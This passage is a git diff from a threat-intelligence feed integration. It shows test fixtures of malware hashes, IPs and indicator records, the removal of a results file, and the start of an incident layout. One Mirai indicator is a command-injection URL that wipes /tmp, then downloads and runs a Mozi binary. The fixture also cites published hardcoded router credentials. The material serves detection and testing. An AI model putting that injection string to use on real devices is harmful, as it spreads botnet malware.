"malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "8f77da6adcfb712a6852fd3878066f856f2d586d", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274769916472, + "hash": [ + "a4ed5e474910dfe978ee22a098620d6a", + "fe67c003786dab0f321f7810935176e2e16619ae", + "73ea068ee928398671901f32d4948117858466f71bfa032b5fd7c66751e32f39" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "3037b69fad7d6554c3b77ba1c8913c6bcc59d69e", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274769919860, + "hash": [ + "a82c68feeafeeb32c1a5577c7358318b", + "6d89e6945a28ac488e10f81a663e0d93834f78a7", + "aa499840005cf5d3e2efd8646dbe90bc212d153c9e79227e9cdbad51d299b5cc" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "cc23e017a6a5b84084e7e8d3b0b280a756fad22d", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274771022481, + "hash": [ + "3b35ca00556ad83c5384601602c6c5c3", + "1c1efdbfe64d93c6a4e6f3acbb367e623e3ac2f3", + "ef46a40bb2e5bec146c8a919b9e8b24398b8db0558979f5b6e6da5cad8f0cced" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "d66e19c8eeb9be69a1bddf83d50b34f918cab53a", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274771025292, + "hash": [ + "2b4f48fb246c30f176826037c51480f5", + "86e64823241c626ae77870a6f6d72a7711e0ebd7", + "b4e27e1efd8342f8dba51d9fe5a60b6987c4d2ae2fe69a9d20809385afd24f17" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "965716f970168f077179cddd465e197f3839630d", + "type": 
"file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274771028560, + "hash": [ + "5471287368aa02e0f1d3a5e35973940e", + "a9e40ebcffd482fca45f01a71e967b2007a6f954", + "92558735981dfae4732d8a0cbf0d961efadaca8df91a02fcf25b863d23e2fee3" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "7653449eafb9ad0339cb05f0212cb73e23e414cc", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274771032562, + "hash": [ + "2d1db3eea6b4092d7506a5405d79d54d", + "c48634cad110703be2476194cbd55b138b8839ad", + "34bc682131c90c50d094b9dc4519dca55d21112dc5f721f845f5d64c05be6fbd" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "691a07decd1e0b789b007e257dabf7d072a4718c", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274771247827, + "hash": [ + "59cb90b1a526ce4646c9ec8a69f3271a", + "e1bb0a3ad08b78d76b6a33dc2d89b6d8c2378ecc", + "543e982bb2384ecb75464f3d3c48a7a89945970bebdf893b851a39867f1ec5b1" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "17471a2d9e619b849e8b267878b2e56b3bab1e0a", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274771252669, + "hash": [ + "9a2aeefb6964c65fe379babee001cf0c", + "e4ce9d27c7eabb66134130714f4d429af70cf4a8", + "78e33c68c7dbe471d3b7cafd3ec6d785d4f468e987499754a127fd057ab838e6" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "89cca2bd4cfdf96e478e93a3c86d4365ca2b4e9d", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274771255468, + "hash": [ + 
"9f2826b716048a6c508ae5a5a46ea125", + "f56e049b36734c9f6ca255b98ff17f9d1f3d364b", + "0e4ef346a4e7b2a8a922032921328118089828b33f37f4ad0881d8be0b929469" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "d37c02ac4504f55f1f597c1505ab06c184997fc5", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274771258480, + "hash": [ + "8e900bc701d40303dfbbd196211f24e6", + "fad1810d1871ebf7570c84fed75d8266a241102a", + "8eb941df19c7bce320f3a057e6ebe888b4c648f5d0d20130d1d720311f1e2d16" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "6524fc97ca192fdf5f2d8040b6ba0e9fe453728a", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274771261574, + "hash": [ + "a5d0f63afa42ac861e318e0a1ad18141", + "fb8df885cb8f3cdbf091c5fa9e73c822fb985623", + "8a39142e1f01ccf9ee546d45539304138efa6ba08a5885f65ae256323a650091" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "d904033ff4654724323a0cbc7e80c698d7ce24cd", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274771264106, + "hash": [ + "26760e61b568567dbce13f6f0679ec68", + "45ec271e968185389333ea4e0a119e2dfda65382", + "e1117d5d2a2e804c45ecdae4d6a67ea4f70f25f62a84d4493974600366cd2ad1" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "6cdb6ab2eae52cf010baf0260fe8eebff0b10704", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274771268250, + "hash": [ + "b15844b46907e5569896a57a4e5588b9", + "68aa57c6aa9781708cf530e524074ec66fcb51ba", + "91b3594ffcd45a22e7cf7ff662c2bdf613be2baacf68c15ad142a27faffaae78" + ], + 
"malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "2854c220b4088abbd92780a3ad62a93ce306a6ef", + "type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17274771724869, + "hash": [ + "7c59d096e8426581250396f1f306e232", + "80031cfd46e81547328ed4d9e2b3d0ef4adb6173", + "b9795a7e3d3e06096722cee44592a3444cd708024cbdac77deec2e21dbacbd66" + ], + "malwareList": [ + { + "name": "Poison Ivy", + "aliases": [ + "Darkmoon", + "PIVY" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "7820781b5698dde17821aa6c4f344ca1ac970a2b", + "type": "file", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17274771995520, + "hash": [ + "9c2ede2554c01bf1f7cad43cf20e6642", + "c3daa0d60ba44b6894b3a44f29593d10f787655a", + "cc87ba8a434e67a8eab6196b4c7ed1b83287c310923dcc1b24796f32c0a36c78" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "91e95b5577e28124664a9ccb9acbd33a650d3f9e", + "type": "file", + "dateFirstSeen": "2024-09-28T00:00:00+03:00", + "dateLastSeen": "2024-09-28T00:00:00+03:00", + "seqUpdate": 17274857803318, + "hash": [ + "fd5f448bf4131dc6a7d37ee1b34aa33e", + "75cbec5f2518c79260f37ea14f7164cf743b7a07", + "479f7d21b677ca27b4beb73136f81120f4d5cc16552f9da883655cc990656c1e" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "2c226f4bc7297f5b002d2f1a9c216908789252e5", + "type": "file", + "dateFirstSeen": "2024-09-28T00:00:00+03:00", + "dateLastSeen": "2024-09-28T00:00:00+03:00", + "seqUpdate": 17274861585401, + "hash": [ + "26d2c0ca876a875a96900562c8daf897", + "44fb275229b24186a216bca11b9503cb6f80bd03", + "7c306458b5dffb1b2325c39e3259145886853d891d300a0cdd13bfc8c6dd2189" + ], + "malwareList": [ + { + "name": "njRAT", + "aliases": [ + "Bladabindi", + "Ratenjay" 
+ ] + } + ], + "threatList": null + }, + { + "id": "c1cadf54cab46f9666a6abc66a29dfa91ea914ec", + "type": "file", + "dateFirstSeen": "2024-09-28T00:00:00+03:00", + "dateLastSeen": "2024-09-28T00:00:00+03:00", + "seqUpdate": 17274870428551, + "hash": [ + "3ba0d8b80f72b59d29a4c6ba05ac8707", + "b3c7d42a45c09409850c0e9aec5e0b3b97363d66", + "f4ad711dc2d2aaecc5dbbc471e54c872f1f2efbb19e6b821955162d893d00db0" + ], + "malwareList": [ + { + "name": "Coinminer", + "aliases": [ + "BitCoinMiner", + "BitMiner" + ] + } + ], + "threatList": null + }, + { + "id": "acbe2a2443a5db6c9ffe2d660968478451538573", + "type": "network", + "dateFirstSeen": "2024-09-28T00:00:00+03:00", + "dateLastSeen": "2024-09-28T00:00:00+03:00", + "url": "http://91.241.86.104/shell?cd+/tmp;rm+-rf+*;wget+http:/192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17274870810525, + "ip": [ + "91.241.86.104" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "3f4bcaedc5e772c482dccc24db22cda40f4fd274", + "type": "network", + "dateFirstSeen": "2024-09-28T00:00:00+03:00", + "dateLastSeen": "2024-09-28T00:00:00+03:00", + "seqUpdate": 17274870811319, + "ip": [ + "77.239.211.238" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "3aafc04874cafc49c810119bd866e6f2b44f3a12", + "type": "file", + "dateFirstSeen": "2024-09-28T00:00:00+03:00", + "dateLastSeen": "2024-09-28T00:00:00+03:00", + "seqUpdate": 17274881649743, + "hash": [ + "aa33ee87de261bc13dbe525e957d8a8b", + "d1a26331e306c1ad0e960063467d166d55f3253d", + "f7550b2d530a0a1eb7b224cc960edcb1d59dee02ddc399c1033ef2e3547596a9" + ], + "malwareList": [ + { + "name": "Spora", + "aliases": [] + } + ], + "threatList": null + } + ], + "count": 12494, + "settings": [], + "seqUpdate": 17274881649743 + } +} \ No newline at end of file 
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/test_data/results.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/test_data/results.json
deleted file mode 100644
index 968829223150..000000000000
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/test_data/results.json
+++ /dev/null
@@ -1,587 +0,0 @@ -{ - "compromised/mule": [ - { - "last_fetch": { - "compromised/mule": 1614413286419 - } - }, - [ - { - "rawJSON": { - "value": "3765123456411567", - "type": "GIB Compromised Mule", - "creationdate": "2020-11-11T16:09:00Z", - "source": "Botnet", - "gibcollection": "compromised/mule", - "gibid": "50a3b4abbfca5dcbec9c8b3a110598f61ba93r33", - "gibmalwarename": "Anubis", - "gibthreatactorid": "d7ff75c35f93dce6f5410bba9a6c206bdff66555", - "gibthreatactorisapt": false, - "gibthreatactorname": "FRK48", - "gibreliability": 100, - "gibcredibility": 80, - "gibadmiraltycode": "A2", - "gibseverity": "red" - } - }, - { - "rawJSON": { - "value": "http://some.ru", - "type": "URL", - "gibcollection": "compromised/mule", - "gibid": "50a3b4abbfca5dcbec9c8b3a110598f61ba93r33", - "gibmalwarename": "Anubis", - "gibthreatactorid": "d7ff75c35f93dce6f5410bba9a6c206bdff66555", - "gibthreatactorisapt": false, - "gibthreatactorname": "FRK48", - "gibreliability": 100, - "gibcredibility": 80, - "gibadmiraltycode": "A2", - "gibseverity": "red" - } - }, - { - "rawJSON": { - "value": "worus.space", - "type": "Domain", - "gibcollection": "compromised/mule", - "gibid": "50a3b4abbfca5dcbec9c8b3a110598f61ba93r33", - "gibmalwarename": "Anubis", - "gibthreatactorid": "d7ff75c35f93dce6f5410bba9a6c206bdff66555", - "gibthreatactorisapt": false, - "gibthreatactorname": "FRK48", - "gibreliability": 100, - "gibcredibility": 80, - "gibadmiraltycode": "A2", - "gibseverity": "red" - } - }, - { - "rawJSON": { - "value": "11.11.11.11", - "type": "IP", - "gibcollection": "compromised/mule", - "gibid": "50a3b4abbfca5dcbec9c8b3a110598f61ba93r33", - "gibmalwarename": "Anubis", - "gibthreatactorid": "d7ff75c35f93dce6f5410bba9a6c206bdff66555", - "gibthreatactorisapt": false, - "gibthreatactorname": "FRK48", - "gibreliability": 100, - "gibcredibility": 80, - "gibadmiraltycode": "A2", - "gibseverity": "red" - } - } - ] - ], - "compromised/imei": [ - { - "last_fetch": { - "compromised/imei": 
1614889064899 - } - }, - [ - { - "rawJSON": { - "value": "http://some.ru", - "type": "URL", - "gibcollection": "compromised/imei", - "gibid": "0c1426048474df19ada9d0089ef8b3efce906556", - "gibmalwarename": "FlexNet", - "gibthreatactorid": "d7ff75c35f93dce6f5410bba9a6c206bdff66555", - "gibthreatactorisapt": false, - "gibthreatactorname": "FRK48", - "gibreliability": 100, - "gibcredibility": 80, - "gibadmiraltycode": "A2", - "gibseverity": "red" - } - }, - { - "rawJSON": { - "value": "some.ru", - "type": "Domain", - "gibcollection": "compromised/imei", - "gibid": "0c1426048474df19ada9d0089ef8b3efce906556", - "gibmalwarename": "FlexNet", - "gibthreatactorid": "d7ff75c35f93dce6f5410bba9a6c206bdff66555", - "gibthreatactorisapt": false, - "gibthreatactorname": "FRK48", - "gibreliability": 100, - "gibcredibility": 80, - "gibadmiraltycode": "A2", - "gibseverity": "red" - } - }, - { - "rawJSON": { - "value": "11.11.11.11", - "type": "IP", - "asn": "AS16276 OVH SAS", - "geocountry": "France", - "gibcollection": "compromised/imei", - "gibid": "0c1426048474df19ada9d0089ef8b3efce906556", - "gibmalwarename": "FlexNet", - "gibthreatactorid": "d7ff75c35f93dce6f5410bba9a6c206bdff66555", - "gibthreatactorisapt": false, - "gibthreatactorname": "FRK48", - "gibreliability": 100, - "gibcredibility": 80, - "gibadmiraltycode": "A2", - "gibseverity": "red" - } - }, - { - "rawJSON": { - "value": "359223056231009", - "type": "GIB Compromised IMEI", - "creationdate": "2018-01-11T01:18:43Z", - "devicemodel": "Nexus S/2.3.7 ($$$Flexnet v.5.5)", - "asn": "AS22222 Some Company", - "geocountry": "Netherlands", - "ipaddress": "11.11.11.11", - "gibcollection": "compromised/imei", - "gibid": "0c1426048474df19ada9d0089ef8b3efce906556", - "gibmalwarename": "FlexNet", - "gibthreatactorid": "d7ff75c35f93dce6f5410bba9a6c206bdff66555", - "gibthreatactorisapt": false, - "gibthreatactorname": "FRK48", - "gibreliability": 100, - "gibcredibility": 80, - "gibadmiraltycode": "A2", - "gibseverity": "red" - } - } 
- ] - ], - "attacks/ddos": [ - { - "last_fetch": { - "attacks/ddos": 1614476823510 - } - }, - [ - { - "rawJSON": { - "value": "isc.org", - "type": "Domain", - "firstseenbysource": "2020-10-16T02:58:53Z", - "lastseenbysource": "2020-10-16T02:58:55Z", - "gibcollection": "attacks/ddos", - "gibid": "26a05baa4025edff367b058b13c6b43e820538a5", - "gibreliability": 90, - "gibcredibility": 90, - "gibadmiraltycode": "A2", - "gibseverity": "red" - } - }, - { - "rawJSON": { - "value": "11.11.11.11", - "type": "IP", - "asn": "AS1280 Internet Systems Consortium, Inc.", - "geocountry": "United States", - "firstseenbysource": "2020-10-16T02:58:53Z", - "lastseenbysource": "2020-10-16T02:58:55Z", - "geolocation": "California", - "gibcollection": "attacks/ddos", - "gibid": "26a05baa4025edff367b058b13c6b43e820538a5", - "gibreliability": 90, - "gibcredibility": 90, - "gibadmiraltycode": "A2", - "gibseverity": "red" - } - } - ] - ], - "attacks/deface": [ - { - "last_fetch": { - "attacks/deface": 26326167 - } - }, - [ - { - "rawJSON": { - "gibcollection": "attacks/deface", - "gibid": "6009637a1135cd001ef46e21", - "type": "URL", - "value": "sadas.sadd.ee", - "gibthreatactorid": "d7ff75c35f93dce6f5410bba9a6c206bdff66555", - "gibthreatactorisapt": false, - "gibthreatactorname": "FRK48", - "gibreliability": 80, - "gibcredibility": 80, - "gibadmiraltycode": "B2", - "gibseverity": "orange" - } - }, - { - "rawJSON": { - "gibcollection": "attacks/deface", - "gibid": "6009637a1135cd001ef46e21", - "type": "Domain", - "value": "sadas.sadd.ee", - "gibthreatactorid": "d7ff75c35f93dce6f5410bba9a6c206bdff66555", - "gibthreatactorisapt": false, - "gibthreatactorname": "FRK48", - "gibreliability": 80, - "gibcredibility": 80, - "gibadmiraltycode": "B2", - "gibseverity": "orange" - } - }, - { - "rawJSON": { - "geocountry": "Indonesia", - "gibcollection": "attacks/deface", - "gibid": "6009637a1135cd001ef46e21", - "type": "IP", - "value": "11.11.11.11", - "gibthreatactorid": 
"d7ff75c35f93dce6f5410bba9a6c206bdff66555", - "gibthreatactorisapt": false, - "gibthreatactorname": "FRK48", - "gibreliability": 80, - "gibcredibility": 80, - "gibadmiraltycode": "B2", - "gibseverity": "orange" - } - } - ] - ], - "attacks/phishing": [ - { - "last_fetch": { - "attacks/phishing": 1614925293641 - } - }, - [ - { - "rawJSON": { - "gibcollection": "attacks/phishing", - "gibid": "fce7f92d0b64946cf890842d083953649b259952", - "type": "URL", - "value": "https://some.ru", - "gibphishingtype": "Phishing", - "gibreliability": 90, - "gibcredibility": 80, - "gibadmiraltycode": "A2", - "gibseverity": "red" - } - }, - { - "rawJSON": { - "creationdate": "2013-11-15T13:41:30Z", - "firstseenbysource": "2021-01-14T11:21:34Z", - "gibcollection": "attacks/phishing", - "gibid": "fce7f92d0b64946cf890842d083953649b259952", - "gibphishingtitle": "", - "gibtargetbrand": "Some brand", - "gibtargetcategory": "Finance > Banking", - "gibtargetdomain": "some.ru", - "registrarname": "Some", - "type": "Domain", - "value": "some.ru", - "gibphishingtype": "Phishing", - "gibreliability": 90, - "gibcredibility": 80, - "gibadmiraltycode": "A2", - "gibseverity": "red" - } - }, - { - "rawJSON": { - "geocountry": "Canada", - "geolocation": "NA", - "gibcollection": "attacks/phishing", - "gibid": "fce7f92d0b64946cf890842d083953649b259952", - "type": "IP", - "value": "11.11.11.11", - "gibphishingtype": "Phishing", - "gibreliability": 90, - "gibcredibility": 80, - "gibadmiraltycode": "A2", - "gibseverity": "red" - } - } - ] - ], - "attacks/phishing_kit": [{"last_fetch": {"attacks/phishing_kit": 1614921031175}}, []], - "apt/threat": [ - { - "last_fetch": { - "apt/threat": 16107218765545 - } - }, - [ - { - "rawJSON": { - "gibcollection": "apt/threat", - "gibid": "1b09d389d016121afbffe481a14b30ea995876e4", - "type": "IP", - "value": "11.11.11.11", - "gibmalwarename": "", - "gibthreatactorid": "5e9f20fdcf5876b5772b3d09b432f4080711ac5f", - "gibthreatactorisapt": true, - "gibthreatactorname": 
"Lazarus", - "gibreliability": 80, - "gibcredibility": 100, - "gibadmiraltycode": "B1", - "gibseverity": "orange" - } - }, - { - "rawJSON": { - "gibcollection": "apt/threat", - "gibid": "1b09d389d016121afbffe481a14b30ea995876e4", - "type": "IP", - "value": "11.11.11.11", - "gibmalwarename": "", - "gibthreatactorid": "5e9f20fdcf5876b5772b3d09b432f4080711ac5f", - "gibthreatactorisapt": true, - "gibthreatactorname": "Lazarus", - "gibreliability": 80, - "gibcredibility": 100, - "gibadmiraltycode": "B1", - "gibseverity": "orange" - } - }, - { - "rawJSON": { - "gibcollection": "apt/threat", - "gibid": "1b09d389d016121afbffe481a14b30ea995876e4", - "type": "Domain", - "value": "some.ru", - "gibmalwarename": "", - "gibthreatactorid": "5e9f20fdcf5876b5772b3d09b432f4080711ac5f", - "gibthreatactorisapt": true, - "gibthreatactorname": "Lazarus", - "gibreliability": 80, - "gibcredibility": 100, - "gibadmiraltycode": "B1", - "gibseverity": "orange" - } - }, - { - "rawJSON": { - "gibcollection": "apt/threat", - "gibid": "1b09d389d016121afbffe481a14b30ea995876e4", - "type": "URL", - "value": "https://some.ru", - "gibmalwarename": "", - "gibthreatactorid": "5e9f20fdcf5876b5772b3d09b432f4080711ac5f", - "gibthreatactorisapt": true, - "gibthreatactorname": "Lazarus", - "gibreliability": 80, - "gibcredibility": 100, - "gibadmiraltycode": "B1", - "gibseverity": "orange" - } - }, - { - "rawJSON": { - "gibcollection": "apt/threat", - "gibfilename": "5d43baf1c9e9e3a939e5defd8f8fbd8d", - "gibid": "1b09d389d016121afbffe481a14b30ea995876e4", - "md5": "5d43baf1c9e9e3a939e5defd8f8fbd8d", - "sha1": "d5ff73c043f3bb75dd749636307500b60a436550", - "sha256": "867c8b49d29ae1f6e4a7cd31b6fe7e278753a1ba03d4be338ed11fd1efc7dd36", - "type": "File", - "value": "5d43baf1c9e9e3a939e5defd8f8fbd8d", - "gibmalwarename": "", - "gibthreatactorid": "5e9f20fdcf5876b5772b3d09b432f4080711ac5f", - "gibthreatactorisapt": true, - "gibthreatactorname": "Lazarus", - "gibreliability": 80, - "gibcredibility": 100, - 
"gibadmiraltycode": "B1", - "gibseverity": "orange" - } - } - ] - ], - "suspicious_ip/tor_node": [ - { - "last_fetch": { - "suspicious_ip/tor_node": 16110967720000 - } - }, - [ - { - "rawJSON": { - "gibcollection": "suspicious_ip/tor_node", - "gibid": "11.11.11.11", - "type": "IP", - "value": "11.11.11.11", - "firstseenbysource": "2020-09-03T14:15:25Z", - "lastseenbysource": "2021-01-20T22:07:33Z", - "gibreliability": 90, - "gibcredibility": 90, - "gibadmiraltycode": "A1", - "gibseverity": "green" - } - } - ] - ], - "suspicious_ip/open_proxy": [ - { - "last_fetch": { - "suspicious_ip/open_proxy": 1614925979879 - } - }, - [ - { - "rawJSON": { - "geocountry": "Czech Republic", - "gibcollection": "suspicious_ip/open_proxy", - "gibid": "cc6a2856da2806b03839f81aa214f22dbcfd7369", - "gibproxyanonymous": "High anonymous / Elite proxy", - "gibproxyport": 80, - "source": "free-proxy-list.net", - "type": "IP", - "value": "11.11.11.11", - "firstseenbysource": "2020-03-19T23:01:01Z", - "lastseenbysource": "2021-01-21T11:01:02Z", - "gibreliability": 50, - "gibcredibility": 50, - "gibadmiraltycode": "C3", - "gibseverity": "green" - } - } - ] - ], - "suspicious_ip/socks_proxy": [ - { - "last_fetch": { - "suspicious_ip/socks_proxy": 1614926061941 - } - }, - [ - { - "rawJSON": { - "asn": "AS60999 Libatech SAL", - "geocountry": "Lebanon", - "gibcollection": "suspicious_ip/socks_proxy", - "gibid": "02e385600dfc5bf9b3b3656df8e0e20f5fc5c86e", - "type": "IP", - "value": "11.11.11.11", - "firstseenbysource": "2021-01-19T07:41:11Z", - "lastseenbysource": "2021-01-21T08:35:46Z", - "gibreliability": 90, - "gibcredibility": 100, - "gibadmiraltycode": "A1", - "gibseverity": "green" - } - } - ] - ], - "malware/cnc": [ - { - "last_fetch": { - "malware/cnc": 1614925981037 - } - }, - [ - { - "rawJSON": { - "gibcollection": "malware/cnc", - "gibid": "aeed277396e27e375d030a91533aa232444d0089", - "type": "URL", - "value": "https://some.ru", - "gibmalwarename": "JS Sniffer - Poter", - 
"firstseenbysource": "2021-01-21T10:35:21Z", - "lastseenbysource": "2021-01-21T10:35:21Z" - } - }, - { - "rawJSON": { - "gibcollection": "malware/cnc", - "gibid": "aeed277396e27e375d030a91533aa232444d0089", - "type": "Domain", - "value": "some.ru", - "gibmalwarename": "JS Sniffer - Poter", - "firstseenbysource": "2021-01-21T10:35:21Z", - "lastseenbysource": "2021-01-21T10:35:21Z" - } - }, - { - "rawJSON": { - "asn": "AS3356 Level 3 Communications, Inc.", - "geocountry": "United States", - "gibcollection": "malware/cnc", - "gibid": "aeed277396e27e375d030a91533aa232444d0089", - "type": "IP", - "value": "11.11.11.11", - "gibmalwarename": "JS Sniffer - Poter", - "firstseenbysource": "2021-01-21T10:35:21Z", - "lastseenbysource": "2021-01-21T10:35:21Z" - } - } - ] - ], - "osi/vulnerability": [ - { - "last_fetch": { - "osi/vulnerability": 16130451156953 - } - }, - [ - { - "rawJSON": { - "cvedescription": "An issue was discovered on FiberHome HG6245D devices through RP2613. The web daemon contains the hardcoded awnfibre / fibre@dm!n credentials for an ISP.", - "cvemodified": "2021-02-11T00:45:00+03:00", - "cvss": 7.5, - "gibcollection": "osi/vulnerability", - "gibcvssvector": "AV:N/AC:L/Au:N/C:P/I:P/A:P", - "gibid": "CVE-2021-27152", - "published": "2021-02-10T19:15:00+03:00", - "type": "CVE", - "value": "CVE-2021-27152", - "gibreliability": 100, - "gibcredibility": 100, - "gibadmiraltycode": "A1", - "gibseverity": "green" - } - } - ] - ], - "ioc/common": [ - { - "last_fetch": { - "ioc/common": 16408877331936 - } - }, - [ - { - "rawJSON": { - "gibcollection": "ioc/common", - "gibid": "1111111111111111111111111111111111111111", - "type": "URL", - "value": "https://some.ru", - "firstseenbysource": "2012-10-24T00:00:00Z", - "lastseenbysource": "2016-10-24T00:00:00Z" - } - }, - { - "rawJSON": { - "gibcollection": "ioc/common", - "gibid": "1111111111111111111111111111111111111111", - "type": "Domain", - "value": "some.ru", - "firstseenbysource": "2012-10-24T00:00:00Z", - 
"lastseenbysource": "2016-10-24T00:00:00Z" - } - }, - { - "rawJSON": { - "gibcollection": "ioc/common", - "gibid": "1111111111111111111111111111111111111111", - "type": "IP", - "value": "11.11.11.11", - "firstseenbysource": "2012-10-24T00:00:00Z", - "lastseenbysource": "2016-10-24T00:00:00Z" - } - } - ] - ] -} diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_APT_Threat_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_APT_Threat_Layout.json new file mode 100644 index 000000000000..30fb5b1328dc --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_APT_Threat_Layout.json 
@@ -0,0 +1,392 @@ +{ + "description": "Layout for GIB APT Threat", + "detailsV2": { + "tabs": [ + { + "id": "summary", + "name": "Legacy Summary", + "type": "summary" + }, + { + "id": "caseinfoid", + "name": "Incident Info", + "sections": [ + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-fce71720-98b0-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "type", + "height": 22, + "id": "incident-type-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "severity", + "height": 22, + "id": "incident-severity-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "owner", + "height": 22, + "id": "incident-owner-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourcebrand", + "height": 22, + "id": "incident-sourceBrand-field", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourceinstance", + "height": 22, + "id": "incident-sourceInstance-field", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "playbookid", + "height": 22, + "id": "incident-playbookId-field", + "index": 6, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Case Details", + "static": false, + "w": 1, + "x": 0, + "y": 0 + }, + { + "h": 2, + "i": "caseinfoid-61263cc0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Notes", + "static": false, + "type": "notes", + "w": 1, + "x": 2, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-6aabad20-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Work Plan", + "static": false, + "type": "workplan", + "w": 1, + "x": 1, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-770ec200-98b1-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "maxW": 
3, + "moved": false, + "name": "Linked Incidents", + "static": false, + "type": "linkedIncidents", + "w": 1, + "x": 1, + "y": 8 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-842632c0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Child Incidents", + "static": false, + "type": "childInv", + "w": 1, + "x": 2, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-4a31afa0-98ba-11e9-a519-93a53c759fe0", + "maxW": 3, + "moved": false, + "name": "Evidence", + "static": false, + "type": "evidence", + "w": 1, + "x": 2, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-7717e580-9bed-11e9-9a3f-8b4b2158e260", + "maxW": 3, + "moved": false, + "name": "Team Members", + "static": false, + "type": "team", + "w": 1, + "x": 2, + "y": 6 + }, + { + "displayType": "ROW", + "h": 2, + "i": 